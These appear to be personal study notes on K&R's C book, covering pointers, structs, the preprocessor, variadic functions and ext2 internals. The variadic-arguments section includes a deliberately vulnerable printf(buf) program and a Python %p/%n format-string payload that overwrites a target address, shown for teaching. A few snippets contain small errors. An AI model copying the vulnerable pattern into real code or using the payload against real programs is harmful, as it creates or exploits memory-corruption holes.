K&RTheCPL

Some notes about reading the 《K&C The C Programming language》

Preface

C is not a big language, and it is not well served by a big book.

C is not a very high level language, nor a big one, and is not specialized to any particular area of application.

Besides showing how to make effective use of the language, we have also tried where possible to illustrate useful algorithms and principles of good style and sound design.

CH1 A Tutorial Introduction

The only way to learn a new programming language is by writing programs in it.

1
2
/* integer division truncates: any fractional part is discarded. */
5 / 9 == 0

table

Magic Number

they convey little information to someone who might have to read the program later, and they are hard to change in a systematic way.

One way to deal with magic numbers is to give them meaningful names. A #define line defines a symbolic name or symbolic constant to be a particular string of characters

Text

A text stream is a sequence of characters divided into lines; each line consists of zero or more characters followed by a newline character. It is the responsibility of the library to make each input or output stream confirm this model

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
int main(){
printf("%x\n" , EOF);
printf("%lu\n" , sizeof(EOF));
}

/* output */
ffffffff
4
//EOF is 32 bits, not enough for `char` to hold

When you need precise control over the character flow, use getchar instead of scanf !

Step to write a program :

  1. Define the problem
    questions like “What is a ‘word’”,”What is a ‘shortest path’”,etc

  2. Compose test cases

    Try to include all boundary conditions, special cases and large/tiny scale of the problem(len(input) == 0 or len(input) >= 2 ** 32). And you can make the definition more concise

  3. Come up with the ‘right’ algorithm and data structure, solve the problem on paper/iPad first.

    You show always spend most of your time planning and solving problem on paper. After you get the right idea, writing code will not cost much time!!!

  4. Write the code

Variables

local variables are also called automatic variables, as they born and recollected automatically, in contrary to static and global/extern variables

Before a function can use an external variable, the name of the variable must be made known to the function; the declaration is the same as before
except for the added keyword extern.

1
2
3
4
5
int returnglobal(void){
extern int global ; // declare that there is a global int
// somewhere out of the function
return global;
}

In certain circumstances, the extern declaration can be omitted. If the definition of the external variable occurs in the source file before its use in a particular function, then there is no need for an extern declaration in the function.

CH2 Types, Operators and Objects

Variable name

Names are made up of letters and digits; the first character must be a letter.

  • library routines often use name begin with a _

  • Upper and lower case letters are distinct

    • lower for variable name

    • upper for symbolic constants(the macro)

Variable size

1
2
#include <limit.h> // implementation defined for integers
#include <float.h> // implementation defined for float point

Constants

1
2
3
4
5
6
7
8
9
10
1234 // int
1234l // long int
1234u // unsigned int
1234ul //unsigned long int
9999999999999999999 // long


1.0 // double
1.0f // float
1.0l // long double
1
2
3
0123 // oct number
0x123 // hex number
0b1001 // binary number

A constant expression is an expression that involves only constants. Such expressions may be evaluated at during compilation rather than run-time, and accordingly may be used in any place that a constant can occur, for example, array definition

The standard library function strlen(s) returns the length of its character string argument s, excluding the terminal '\0'.

1
2
'a' // integer value 97
"a" // array of chars: ['a' , '\0']
enumeration constant

An enumeration is a list of constant integer values.

Enumerations provide a convenient way to associate constant values with names, an alternative to #define with the advantage that the values can be generated for you.

1
2
3
4
5
enum name { var1 , var2 , var3 }; //definition
// vars automatically get the value
// var1 = 0 , var2 = var1+1 var3= var2 + 1
int var = var1 ; //usage
//We don't need to refer to the `name` since Names in different enumerations must be distinct when we define it.
1
2
3
4
5
6
7
// Make a Python-like boolean type when <stdbool.h> is missing
enum bools { False , True };
if ( True ){
...
} else {
...
}

Arithmetic

The % operator cannot be applied to a float or double.

1
2
if (!valid) // read nicely by "If not valid"
// ! serves as `not` in Python

Characters

1
2
3
4
#include <ctype.h>
//defines a family of functions that provide tests and conversions
// that are independent of character set.
// (No matter it is UTF-8 or ASCII or EBCDIC)

For portability, specify signed or unsigned if non-
character data is to be stored in char variables.

Operators

1
2
++c ; // increments c before its value is used
c++ ; // increments c after its value is used
1
2
3
4
5
c += 1 + 2  // c += (1+2)
// c = c + 1 + 2
/*
operator= always have lower precedence than normal operators
*/
1
2
3
4
5
condition ? res1 : res2 ; // this is an expression
/*
If expr2 and expr3 are of different types,
the type of the result is determined by the conversion rules
*/
1
2
3
4
5
6
7
8
//write succinct code
for (i = 0; i < n; i++)
printf("%6d%c", a[i], (i%10==9 || i==n-1) ? '\n' : ' ');
/*
this loop prints n elements of an array, 10 per line,
with each column separated by one blank,
and with each line (including the last) terminated by a newline.
*/

Precedence

Operators on the same line have the same precedence;
rows are in order of decreasing precedence

precedence

CH3 Control Flow

Loops

1
2
3
4
for ( expr1 ; expr2 ; expr3){
...
}
// if expr2 is omitted, it serves like a true, the loop will be infinity

Comma

A pair of expressions separated by a comma is evaluated left to right, and the type and value of the result are the type and value of the right operand.

The commas that separate function arguments, variables in declarations, etc., are not comma operators, and do not guarantee left to right evaluation.

Continue

expr3 will be executed after continue

1
2
3
4
5
6
for (int i = 0 ; i < N ; i++){
if (a[i] <= 0){
continue ; //skip negative and 0
}
process_positive();
}

Goto

Use it rarely, or try to avoid using it at all.

1
2
3
4
5
6
7
8
9
10
for ( ... ){
for (...){
for (...){
if(error) goto handler ;
}
}
}
handler:
printf("error\n");
// breaking out of two or more loops at once.

CH4 Functions and Program Structure

C does not allow functions to be defined inside other functions(Not like Python), but declaration is OK.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdio.h>

// global declaration, can be used any where
void global(void);
void mm();


int main(){
void local(void);
//local declaration, can only be accessed inside the function
//access it in `mm` will result in a warning
local();
mm();
}

void mm(){
local(); //[Warning] use of out-of-scope declaration
global();
}


void local(void){ printf("local\n"); }
void global(void){ printf("global\n"); }

Static

  • static serve as private in C, limit access to the source file contains it.

  • static variable is permanent and private in a function

Register Variables

A register declaration advises the compiler that the variable in question will be heavily used. The idea is that register variables are to be placed in machine registers, which may result in smaller and faster programs. But compilers are free to ignore the advice.

  • The register declaration can only be applied to automatic variables and to the formal parameters of a function.

  • it is not possible to take the address of a register variable

Block

1
2
3
{

}
  • An automatic variable declared and initialized in a block is initialized each time the block is entered

  • hide external variables and functions of the same name.

  • As a matter of style, it’s best to avoid variable names that conceal names in an outer scope; the potential for confusion and error is too great.

Recursion

A way to print an integer digit by digit other than using an array

1
2
3
4
5
void printn(int n){
if ( n == 0 ) return ; // recursion base
printn( n / 10 ); // print the previous digits
putchar( n % 10 + '0'); // print the last digit
}

Macro substitution

Substitutions are made only for tokens, and do not take place within quoted strings. For example, if YES is a defined name, there would be no substitution in printf("YES") or in YESMAN.

1
2
3
#define swap(a,b) a = a ^ b ;\
b = a ^ b ;\
a = a ^ b

Names may be undefined with #undef, usually to ensure that a routine is really a function, not a macro

1
2
#undef getchar
int getchar(void) { ... }

A parameter name is preceded by a # in the replacement text, the combination will be expanded into a quoted string with the parameter replaced by the actual argument.

1
2
3
4
5
6
7
#include <stdio.h>
#define dprint(varname) printf(#varname " = 0x%x\n" , varname)

int main(){
int a = 23423;
dprint(a);
}

You can see the substitution result by preprocess the source file

1
$ gcc -E source.c -o afterpre.c

The preprocessor operator ## provides a way to concatenate names during macro expansion.

1
2
#define paste(front, back) front ## back 
// so paste(name, 1) creates the token name1.

Conditional Inclusion

The #if line evaluates a constant integer expression. If the expression is non-zero, subsequent lines until an #endif or #elif or #else are included.

The expression defined(name) in a #if is 1 if the name has been defined, and 0 otherwise.

1
2
3
4
5
6
7
8
9
10
11
12
//check if header has already been included
#if !define(Flag) // if not include
// include it
#define Flag
#include "head.h"

#endif



#ifdef Flag // shortcut for define()
#ifndef Flag // shortcut for !define()
1
2
3
4
5
6
7
8
9
10
11
//tests the name SYSTEM to decide which version of a header to include:
#if SYSTEM == SYSV
#define HDR "sysv.h"
#elif SYSTEM == BSD
#define HDR "bsd.h"
#elif SYSTEM == MSDOS
#define HDR "msdos.h"
#else
#define HDR "default.h"
#endif
#include HDR

CH5 Array and Pointer

Any pointer can be cast to void * and back again without loss of information

1
void * p ; //a generic pointer

When an array name is passed to a function, what is passed is the address of the initial element. Within the called function, this argument is a local variable, and so an array name parameter is a pointer, that is, a variable containing an address, which can be changed.

1
2
3
4
5
6
7
int array [N] ;
array++ // Invalid !


void function(int a []){
a++ ; // Valid.
}

String Pointers

C does not provide any operators for processing an entire string of characters as a unit. It is always an array

1
2
3
4
5
6
7
char amessage[] = "now is the time"; /* an array */
char *pmessage = "now is the time"; /* a pointer */

amessage[0] = '1' ; // OK
pmessage[0] = '1' ; // Segmentation Fault
/* pmessage is just a pointer, an address, the acutal data
located at .rodata section in the elf, it is read-only */
1
2
3
4
//strcpy, implementation friendly version
char * source = ... ;
char * destination = ... ;
while ( *destination++ = *source++ ) ; // The C one-liner
1
2
*p++ = val;  /* push val onto stack */
val = *--p; /* pop top of stack into val */

Want to return a string in a function ?

We can only return pointer, so let’s have some private and permanent space

1
2
3
4
5
6
7
8
9
10
11
12
char* duplicate(const char * string){
const size_t size = 1001 ;
static char buffer [size]; // allocate private space in .data
char * head = buffer ;
size_t len = strlen(string);
if ( len <= 1000 ){
while( *head++ = *string++ );
return buffer;
}
else{ return NULL ;}

}

Array pointer

1
2
3
4
5
char stringarray [10][100] ;
/* We can also treat it as 10 pointers */
void fun(char [][100]); //Only the first dimension can be omitted
/* Since it is still a pointer, but we have to know how much space it treated as a single unin */
void fun(char (*)[100]);

The important advantage of the pointer array(int* pointers [10]) over multi-dimension array(int array[10][20])is that the rows of the array may be of different lengths(not 20).

vs

Pointers to Functions

In C, a function itself is not a variable, but it is possible to define pointers to functions, which
can be assigned, placed in arrays, passed to functions, returned by functions, and so on.

(Since it is just the entry address of a section of code!)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
void swap(int * a , int * b){
int temp = *a ;
*a = *b ;
*b = temp;
}

int main(){
printf("The address of function swap is %p\n" , swap);
}

/*
KR % ./a.out
The address of function swap is 0x10d99cf10
KR % ./a.out
The address of function swap is 0x1032e8f10
KR % ./a.out
The address of function swap is 0x101502f10
*/

You can use it just like an array name

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
//Define
#include <stdio.h>
#define pattern "Test passed"
void echo(void){
printf(pattern "\n");
}
void put(void){
puts(pattern);
}
void walk(void){
char * walk = pattern ;
while(*walk){ putchar(*walk++); }
putchar('\n');
}
int main(){
void (*farray[3])(void) = {echo , put , walk};
for (int i = 0 ; i<3 ;i++){
farray[i]();
}
}
1
2
3
4
5
void (*fp)(void); // fp is a pointer, pointing to a function

name[N] // name is an array of N elements
void (*name[N])(void) //name is an array of N elements
//element is a pointer points to function whose prototype is void f(void)
1
2
3
4
5
6
7
8
9
10
11
12
13
//used in sorting function
#include <stdio.h>
#include <stdbool.h>
bool compare(int a , int b){
return a < b ;
}
void sort(bool (*cmp)(int a , int b)){
bool res = (*cmp)(1,2);
printf("%d\n" , res);
}
int main(){
sort(compare);
}

How to read a C declaration ?

1
2
3
4
5
//recall operator precedence
() > [] > *
left to right left to right right to left
//the rule
from inside to outside
1
2
3
4
5
6
7
8
9
10
11
char (*(*x())[])() ;
1. x() // x is a function
2. *x() // x is a function returning a pointer
3. (*x())[] // x is a function returning a pointer points an array
4. (*(*x())[]) // x is a function returning a pointer points an array whose element is pointer
5. (*(*x())[])() // x is a function returning a pointer points an array whose element is pointer pointing a function
6. char (*(*x())[])() // x is a function returning a pointer points an array whose element is pointer pointing a function whose return type is char


char (*(*x[3])())[5] ;
//x: array[3] of pointer to function returning pointer to array[5] of char

The book also provide a ‘recursion descend’ program to understand the declaration.

CH6 Structure

A structure is a collection of one or more variables, possibly of different types, grouped together under a single name for convenient handling.

1
2
3
4
5
6
7
8
9
10
11
//struct name is optional
struct { ... } x, y, z;

// is syntactically analogous to
int x, y, z;

//it is handy to use combined with typedef
typedef struct{
int x ;
int y ;
}Point;

Structures can be copied as a whole entity, passing to or returning by a function.

In x86_64 architecture, according to my observation, big struct is passing and returning via using stack space, rax or rdx serve as the pointer pointing to returned space

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
struct point { long x ; long y,z,p,q,m,n ;} ;
struct point init(long int x, long int y,long int z,long int p,long int q,long int m,long int n ){
struct point res ;
res.x = x ;
res.y = y ;
res.z = z ;
res.p = p ;
res.q = q ;
res.m = m ;
res.n = n ;
return res;
}

int main(){
struct point p ;
p = init(0xcccc,0xcccc,0xbbbb,0xbbbb,0xbbbb,0xffffffff,0xffffffff);
return 0;
}

We all know that struct will be padding if they are not aligned. How can we tell the exact size ? We use sizeof

1
2
3
4
5
struct {
char a ;
int b ;
} var ;
sizeof(var);

Structures are useful when implementing hash table, since pair structure is natural for it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
/* simple hash table */
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>

struct entry {
char * key ;
char * value ;
struct entry * next ;
};

#define SIZE 100
struct entry * table [SIZE] ;

size_t hash(char * string){
srand(99);
size_t hashvalue = (size_t)rand();
while(*string){ hashvalue+=*string++; }
return hashvalue % SIZE;
}

bool install(char * k , char * v){
size_t index = hash(k);
struct entry * newentry = (struct entry*)malloc(sizeof(struct entry));
if (newentry == NULL ) return false ;
newentry->key = k ;
newentry->value = v ;
newentry->next = NULL ;
if(table[index] == NULL){
table[index] = newentry ;
}
else{
struct entry * walk = table[index];
for(; walk->next ; walk=walk->next);
walk->next = newentry ;
}
return true;
}

char * fetch(char * key){
size_t index = hash(key);
if(table[index] == NULL){
return NULL;
}
else{
if (strcmp(key, table[index]->key) == 0){
return table[index]->value;
}
else{
struct entry * walk = table[index]->next;
while(walk){
if (strcmp(key, walk->key) == 0){
return walk->value;
}
walk = walk->next ;
}
}
}
return NULL;
}

int main(){
install("Hello", "World");
install("1", "2");
install("name", "Jack");
printf("Hello : %s\n" , fetch("Hello"));
printf("1 : %s\n" , fetch("1"));
printf("name : %s\n" , fetch("name"));
}

Mimic class via combining struct and function pointer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdio.h>
#include <stdlib.h>

typedef struct person {
int age ;
char * name ;
struct person * this ;
void (*show)(struct person *) ;
}Person;

static void show(struct person* this ){
printf("age : %d name : %s\n" , this->age , this->name);
}


static Person * newPerson(int a , char * n){
Person * this = (Person*)malloc(sizeof(Person));
this->age = a ;
this->name = n ;
this->this = this ;
this->show = show ;
return this ;
}

int main(){
Person * p = newPerson(22, "Jack");
p->show(p->this);
}

Union

In effect, a union is a structure in which all members have offset zero from the base, the structure is big enough to hold the ``widest’’ member, and the alignment is appropriate for all
of the types in the union.

As a result, the syntax is almost the same

  • A union may only be initialized with a value of the type of its first member

  • a union can be used to force a variable to be
    aligned on a particular kind of storage boundary

1
2
3
4
5
6
7
8
9
10
11
#include <stdio.h>
typedef union u{
int integer ;
char three [3] ;
}U; //force three to be aligned to 4 bytes

int main(){
printf("%lu\n" , sizeof(U)) ;
}
/* output */
4

Bit-fields

Alternative to bitwise operation

1
2
3
4
5
struct {
unsigned int is_keyword : 1;
unsigned int is_extern : 1;
unsigned int is_static : 1;
} flags;
  • This defines a variable table called flags that contains three 1-bit fields

  • The number following the colon represents the field width in bits.

  • The fields are declared unsigned int to ensure that they are unsigned quantities.

  • Almost everything about fields is implementation-dependent.

  • They are not arrays and they do not have addresses, so the & operator cannot be applied on them.

  • Fields may be declared only as ints; for portability, specify signed or unsigned explicitly

CH 7 Input and Output

printf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
:%s:          :hello, world:
:%10s: :hello, world:
:%.10s: :hello, wor:
:%-10s: :hello, world:
:%.15s: :hello, world:
:%-15s: :hello, world :
:%15.10s: : hello, wor:
:%-15.10s: :hello, wor :

1. %10s means print at least 10 characters

2. %.10s means print at most 10 characters

printf("%.*s" , maxlen , string);

3. %-10s means adjust s to left

Variable-length Argument Lists

the declaration ... means that the number and types of these arguments may vary. The declaration ... can only appear at the end of an argument list.

1
void myprintf(char * fmt , ...);
  • The standard header <stdarg.h> contains a set of macro definitions that define how to step through an argument list.
  1. The type va_list is used to declare a variable that will refer to each argument in turn;

  2. The macro va_start initializes va_list to point to the first unnamed argument. It must be called once before va_list is used. There must be at least one named argument (fmt)

  3. Each call of va_arg returns one argument and steps va_list to the next; va_arg uses a type name
    to determine what type to return and how big a step to take.

  4. Finally, va_end does whatever cleanup is necessary. It must be called before the program returns

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <stdio.h>
#include <stdarg.h>

//print n numbers
void myprintf(char * fmt , ...){
int n ;
int number ;
sscanf(fmt, "%d" ,&n );
va_list walk ; // pointer
va_start(walk, fmt); // point to the first unnamed argument after fmt
for(int i = 0 ; i < n ; i++){
int number = va_arg(walk, int); // dereference the pointer as int and point to next anonymous arg, moving the pointer sizeof(int) bytes forward
printf("%d\n" , number);
}
va_end(walk);
}

int main(){
myprintf("3" , 999 , 666 , 777);

}

printf in stdio has a similar logic here, and the printing loop is not controlled by n but by the format string fmt

So we can have the format string exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
int target ;
int main(int argc , char * argv []){
printf("Target : %p\n" , &target);
char buf [1000] ;
char c ;
char * walk = buf ;
while( ( c = getchar() ) != EOF ) {
*walk = c ;
walk++;
}
printf(buf); // format string exploit
if ( target ) puts("!!!!!!!!!!!!!!!");
}

// You may want to turn off Linux ASLR first
1
2
3
4
5
6
7
8
target = 0x555555558044
btarget = target.to_bytes(8,'little')
import sys
sys.stdout.buffer.write(b'{%p}'*18)
sys.stdout.buffer.write(b'{%p}')
sys.stdout.buffer.write(b'{%n}')
sys.stdout.buffer.write(b'A'*16)
sys.stdout.buffer.write(btarget)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// printf.c
#include <libioP.h>
#include <stdarg.h>
#include <stdio.h>
#undef printf
/* Write formatted output to stdout from the format string FORMAT. */
/* VARARGS1 */
int
__printf (const char *format, ...)
{
va_list arg;
int done;
va_start (arg, format);
done = __vfprintf_internal (stdout, format, arg, 0);
va_end (arg);
return done;
}
#undef _IO_printf
ldbl_strong_alias (__printf, printf);
ldbl_strong_alias (__printf, _IO_printf);

Then in __vfprintf_internal there are thousands lines of code, and there is a function called __find_specwc to find the first “argument” to print, so just don’t dig in too deep.

By the way, if you want to know How is “__builtin_va_list” implemented?, you may need to study the source code of your compiler rather than C stdlibs.

File

When a C program is started, the operating system environment is responsible for opening three files(stdin,stdout,stderr) and providing pointers for them.

1
2
3
//getchar and putchar can be defined in terms of getc, putc, stdin, and stdout as follows:
#define getchar() getc(stdin)
#define putchar(c) putc((c), stdout)

CH8 The UNIX System Interface

A directory is a file that contains a list of filenames and some indication of where they are located. The “location’’ is an index into another table called the inode list. The inode for a file is where all information about the file except its name is kept. A directory entry generally consists of only two items, the filename and an inode number.

The whole point with “everything is a file” is not that you have some random filename (indeed, sockets and pipes show that “file” and “filename” have nothing to do with each other), but the fact that you can use common tools to operate on different things.

By  Linus Torvalds

Is directory and regular file the same?

The answer is : Yes, but also NO

How files are organized is highly depend on the file system, and there are tons of file system

Let’s take EXT2 as an example here

How they can be the same?

They are both byte stream.

same

We have a directory organization like this in ext2 file system

1
2
3
4
5
6
7
8
# left side
.
|-- file1
|-- lost+found
`-- mydir
|-- file2
|-- file3
`-- newdir
1
2
3
4
5
6
7
8
# right side
.
|-- file1
|-- lost+found
`-- mydir
|-- file2
|-- file3
`-- file4

We can see that:

1
2
3
4
>>> getcontent(file4)
[0x43 , 0x43 , 0x43 , 0x43 , 0x0a] # CCCC\n
>>> getcontent(newdir)
[0x10 , 0x00 , 0x00 , 0x00 , 0x0c , 0x00 , ... , 0x2e , 0x2e]

Content of regular file can be anything, characters, video data, binary instructions,…

Content of directory have fixed meaning, since they are created by file system, rather than arbitrary data generated by user. In ext2, they are

1
2
3
4
5
6
struct{
long inode_number;
int entry_size ;
int name_length ;
char [name_length] filename ;
}

more

1
2
3
4
5
6
7
8
# left
.
|-- file1
|-- lost+found
`-- mydir
|-- file2
|-- file3
`-- file4
1
2
3
# right
.
|-- lost+found

How they can be different ?

It is nonsense to read the content of a directory as raw bytes and people always want the files in the directory.

In modern times there are many kinds of filesystems that can be mounted by Linux and other unix-like systems (ext4, ZFS, NTFS!), some of which have complex directory formats. You can’t do anything sensible with the raw bytes of an arbitrary directory. So the kernel has taken on the responsibility of providing a generic interface to directories as abstract objects. readdir is the central piece of that interface.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
void show(int fd){
char c ;
int n_read ;
while((n_read = read(fd , &c , 1)) > 0){
putchar(c);
}
if (n_read == 0){
//EOF
printf("[END]\n");
}
else{
//ERROR
printf("[ERROR] : %s\n" , strerror(errno));
}

}
int main(){
// Reading a regular file
int fd = open("/path/to/file", O_RDONLY , 0);
show(fd);
close(fd);
// Reading a directory
fd = open("/path/to/dir" , O_RDONLY , 0);
show(fd);
close(fd);
}
1
2
3
4
$ ./a.out
HelloAAAA
[END]
[ERROR] : Is a directory

No readdir any more

However, we can still operate on the uniform interface provided by the standard library

1
2
3
4
5
6
7
8
9
10
11
#include <stdio.h>
#include <dirent.h>
int main(){
FILE * fp = fopen("/path/to/file","r");
char line [1000];
while( fgets(line, 1000, fp) ){ puts(line); }

DIR * dp = opendir("/path/to/dir/");
struct dirent * entry ;
while( (entry = readdir(dp)) != NULL ){ puts(entry->d_name); }
}
1
2
3
4
5
6
7
8
$ ./a.out
HelloAAAA

..
.
newdir
file2
file3

More about file system on Linux (ext2 as example)

According to Linux documentation project, file system

  • We can hide files in a directory by mounting a file system at the directory, the files will be recovered after umounting.

  • The real file systems were separated from the operating system and system services by an interface layer known as the Virtual File system, or VFS.

    All of the details of the Linux file systems are translated by software so that all file systems appear identical to the rest of the Linux kernel and to programs running in the system. Linux’s Virtual File system layer allows you to transparently mount the many different file systems at the same time.

  • Physical Layout of the EXT2 File system

    UNIX FS layout
  • In the EXT2 file system, the inode is the basic building block; every file and directory in the file system is described by one and only one inode.Inode structure

    1
    2
    3
    4
    5
    6
    7
    class Inode():
    def __init__(self):
    self.mode
    self.ownerInfo
    self.size
    self.timestamps
    self.datablocks

  • Super block

    The Super block contains a description of the basic size and shape of this file system. The information within it allows the file system manager to use and maintain the file system. Usually only the Super block in Block Group 0 is read when the file system is mounted but each Block Group contains a duplicate copy in case of file system corruption.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    $ apt install sleuthkit
    $ fsstat file_s.img
    FILE SYSTEM INFORMATION
    --------------------------------------------
    File System Type: Ext2
    Volume Name:
    Volume ID: bf800aaad8ff14851b4bf9289b25ea9d

    Last Written at: 2022-06-29 02:28:03 (EDT)
    Last Checked at: 2022-06-29 00:43:35 (EDT)

    Last Mounted at: 2022-06-29 02:28:03 (EDT)
    Unmounted Improperly
    Last mounted on: /root/.cache/test/mountpoint

    Source OS: Linux
    Dynamic Structure
    Compat Features: Ext Attributes, Resize Inode, Dir Index
    InCompat Features: Filetype,
    Read Only Compat Features: Sparse Super, Large File,

    METADATA INFORMATION
    --------------------------------------------
    Inode Range: 1 - 17
    Root Directory: 2
    Free Inodes: 0

    CONTENT INFORMATION
    --------------------------------------------
    Block Range: 0 - 99
    Block Size: 1024
    Reserved Blocks Before Block Groups: 1
    Free Blocks: 75

    BLOCK GROUP INFORMATION
    --------------------------------------------
    Number of Block Groups: 1
    Inodes per group: 16
    Blocks per group: 8192

    Group: 0:
    Inode Range: 1 - 16
    Block Range: 1 - 99
    Layout:
    Super Block: 1 - 1
    Group Descriptor Table: 2 - 2
    Data bitmap: 3 - 3
    Inode bitmap: 4 - 4
    Inode Table: 5 - 6
    Data Blocks: 7 - 99
    Free Inodes: 0 (0%)
    Free Blocks: 75 (75%)
    Total Directories: 4
  • Finding a file in ext2

    1. The first inode we need is the inode for the root of the file system and we find its number in the file system’s super block. (To read an EXT2 inode we must look for it in the inode table of the appropriate Block Group)

    2. use this inode to find the data block which hold subdirectories’ names and inode numbers

    3. use subdirectory’s inode number to find the data block where the file’s name and inode is holden.

    4. use inode of the file to find the actual data block

  • the VFS describes the system’s files in terms of super blocks and inodes in much the same way as the EXT2 file system uses super blocks and inodes.

  • How it related to file descriptor

As a conclusion, I think file system is just like device driver

Read more

analysis file system

forensics

Good question

use debugfs to recover deleted file

inode related problem

copy inode metadata with cp -a

file system do not use inode

Do experiment yourself
1
2
3
4
5
6
7
8
9
10
11
mkdir mountpoint
dd if=/dev/zero of=file_s.img bs=50k count=2
mkfs.ext2 file_s.img
cp file_s.img file_s_orig.img
mount -o loop file_s.img mountpoint
# make change in the mounted fs
df -l # find the mounted name
umount /dev/loop0
xxd file_s.img > after
xxd file_s_orig.img > before
vimdiff after before